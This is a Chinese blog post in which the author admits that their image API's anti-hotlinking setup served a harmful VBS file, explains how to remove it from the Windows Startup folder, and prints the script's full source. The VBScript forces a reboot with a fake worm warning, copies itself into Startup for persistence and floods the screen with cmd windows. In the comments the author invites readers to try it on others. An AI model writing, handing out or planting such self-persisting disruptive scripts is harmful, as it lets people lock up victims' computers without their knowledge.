IP授权？大佬，你的接口有毒啊

Author：爆胎
发布时间：August 28, 2020
2009views
19 comments
1801 words
Categories：记事

## 起因
呃，事情是这样的，之前做接口，顺手把防盗链加了上去，避免`CND`流量的浪费，再一个也是为了资源的保护，接口的每张图都是慢慢收集而来的。防盗做了点小小改动，导致一些同学中了招，哈哈，非常抱歉了，本利是想着玩一玩的，我觉得应该不会有人真的去运行的，没想到还真的有 <img src="https://www.itggg.cn/usr/themes/handsome/assets/img/emotion/aru/surprised.png" class="emotion-aru"> 。而且最近中招的人数也慢慢多了， 我本来是想防止恶意的扒接口，没想到给站长朋友们带来了不便，我觉得还是不太好，就在这里写篇文章说一下破解的办法。

[album]

![](https://img-1259793745.itggg.cn/20201222210117.jpg)
![](https://img-1259793745.itggg.cn/20201222210118.png)
![](https://img-1259793745.itggg.cn/20201222210119.jpg)
![](https://img-1259793745.itggg.cn/20201222210120.jpg)
![](https://img-1259793745.itggg.cn/20201222210121.jpg)
[/album] </div>

&nbsp;
<div class="tip inlineBlock error">

第一种
</div>

系统启动后， 马上按  <kbd>Windows</kbd>+<kbd>R</kbd>  输入 **shell:Common Startup** 快速打开开机启动文件夹，删除这个文件，`win10` 在开机后只要不是直接添加到注册表里面的程序，都会有  `3S-5S`   的延迟去启动`Startup`内的文件，就趁这个时间来删除掉就行了，启动速度的快慢取决你的电脑运行。

&nbsp;
<div class="tip inlineBlock error">

第二种
</div>

找个`U`启动的软件，进入到系统里，把开机启动项里的文件删除掉。推荐[diskgenius](https://www.diskgenius.cn/?from=dg) ,基于硬盘层面的操作，可以直接进入到系统盘里面去删掉这个文件，然后重新启动系统。

&nbsp;
## 结语
为了表示歉意，把防盗原理也一并共享出来了，原理很简单，触发`403`后，返回自定义页面，禁止空`Referer`请求，一般很多cdn的厂商都有这个个性化选择，比如`404、403、500、502、504`等等 。我用是百度云的`CND `[百度云cdn错误码自定义说明](https://cloud.baidu.com/doc/CDN/s/rjwvyesn0) 
其他厂商请自己找找看。也可以搞高级鉴权，比较麻烦，这里不再赘述了，有需求的自己百度下。
为了防止更多的人中招，这里直接把`vbs`的源码放出来，有兴趣的可以拿去玩玩，本机**切勿执行，切勿执行，切勿执行**，可以在虚拟机上试试看。

```
set ws=CreateObject("Wscript.Shell")
ws.run "cmd.exe /c shutdown -r -t 20 -c ""蠕虫病毒释放中"" ",0 ,true
set fso = createobject("scripting.filesystemobject")
set ws = createobject("wscript.shell")
pt = ws.specialfolders("startup") & "\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt
Set shell=CreateObject("wscript.Shell")
a=100
Do
shell.Run "cmd /k MODE con: COLS=14 LINES=5&@echo off & color "&a&"7 &echo "&a&" "
If a=1 Then Exit do
a=a+1000
set ws=createobject("wscript.shell") 
do 
ws.sendkeys "{f5}" 
loop
loop
```
&nbsp;
## 执行效果
<iframe src="https://v.itggg.cn/?url=https://bos.itggg.cn/hls/win10.mp4" allowfullscreen="allowfullscreen" mozallowfullscreen="mozallowfullscreen" msallowfullscreen="msallowfullscreen" oallowfullscreen="oallowfullscreen" webkitallowfullscreen="webkitallowfullscreen" width="100%" height="500px" frameborder="0"></iframe>

Last modification：December 22nd, 2020 at 09:01 pm

如果你想请我喝奶茶的话

19 comments

还好
2020年 12月 08日 15时 42分

测试评论

Reply
越行勤
2020年 12月 02日 20时 11分

这都是什么神仙哇

Reply
1. 爆胎
  2020年 12月 03日 18时 05分
  
  @越行勤
  啊哈哈，拿去试试看，有没有人中招！
  
  Reply
金石热点网
2020年 09月 23日 12时 15分

文章写的不错,加油

Reply
1. 爆胎
  2020年 09月 23日 13时 42分
  
  @金石热点网
  哈哈，谢谢大佬来访
  (´இ皿இ｀)
  
  Reply
11
2020年 09月 11日 17时 26分

11

Reply
爆胎了
2020年 09月 10日 10时 14分

我也中了大佬的毒

Reply
1. 爆胎
  2020年 09月 10日 17时 37分
  
  @爆胎了
  什么毒？你是谁
  
  Reply
MikeFeng
2020年 08月 29日 11时 53分

我特意试了一下，除了重启没啥后遗症！

Reply
1. 爆胎
  2020年 08月 29日 12时 19分
  
  @MikeFeng
  哈哈，是的，蠕虫只是个幌子，实际就是不断弹出cmd，然后定时关机，导致没法操作，然后自动加入开机启动项，重启后不断循环。
  
  Reply
  1. MikeFeng
    2020年 08月 29日 21时 42分
    
    @爆胎
    开机启动被火绒拦截了，所以没啥后遗症：）
    
    Reply
胎爆
2020年 08月 28日 21时 58分

我深深中了大佬的毒

Reply
1. 爆胎
  2020年 08月 29日 12时 17分
  
  @胎爆
  我也中了你的毒⌇●﹏●⌇
  
  Reply
胎爆
2020年 08月 28日 21时 58分

我深深中了大佬的毒

Reply
Ty
2020年 08月 28日 17时 21分

受害者我在这里！

Reply
1. wibus
  2020年 08月 29日 21时 40分
  
  @Ty
  看你下次还敢爬哈哈哈哈哈（似乎语气有点不太友好
  
  Reply
2. 爆胎
  2020年 08月 28日 17时 49分
  
  @Ty
  哈哈哈，不好意思了老哥
  
  Reply
3. Ty
  2020年 08月 28日 17时 24分
  
  @Ty
  还好那是虚拟机，我在Mac系统直接删掉了虚拟机里面文件，开机就显示找不到文件了ヾ(≧∇≦*)ゝ
  
  Reply
wibus
2020年 08月 28日 16时 37分

Reply